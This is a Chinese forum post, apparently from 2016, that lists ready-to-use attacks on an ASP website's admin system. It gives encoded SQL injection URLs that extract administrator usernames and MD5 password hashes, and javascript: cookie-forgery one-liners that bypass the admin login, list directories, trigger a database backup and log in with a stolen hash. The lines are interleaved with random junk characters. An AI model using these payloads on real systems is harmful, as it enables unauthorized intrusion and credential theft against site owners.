一、注入
- m8 q% W1 C6 Y) \1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
) S$ s2 i2 R$ p9 C/ m3 d Q+ |2 d: e4 L' b
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" ) [: b1 _ }$ [! ?, F3 Y9 Z& _
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin5 K, E6 T7 N' T4 V
可得到用户名和MD5加密码的密码。2 N. k( m% Q4 B8 C* g
) P( Z3 ^- d$ M# D! l8 C# [" G二、cookies欺骗
; B5 |! W8 x0 ~: k
3 g& k7 _5 _. N8 {7 w6 ?1 k: j1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. ( E% t; ^# ]! [$ o6 U6 }7 L) p' |
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"% c: v: T+ T. {8 Q, N
3 Z! z% B0 O5 b. p& a
2、列目录. % _! O- ?) _! n1 \9 x: m
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."; d7 K% M9 z. F/ j; C
: E8 M7 V4 z% Q3 D3、数据库备份(适用性好像比较低.) + o `; F9 O! y6 f/ Z& ?
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"/ U' Y$ t# `& Z2 f2 c2 z( ]
" _# g. a1 e$ X4 M- V/ O4、得到MD5密码解不了密进后台方法, g' d( m z) {" x7 ~3 M% `5 F
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
: T: N; H3 X& A2 ?5 z |
发表于 2016-5-11 14:55:08
收藏
支持
反对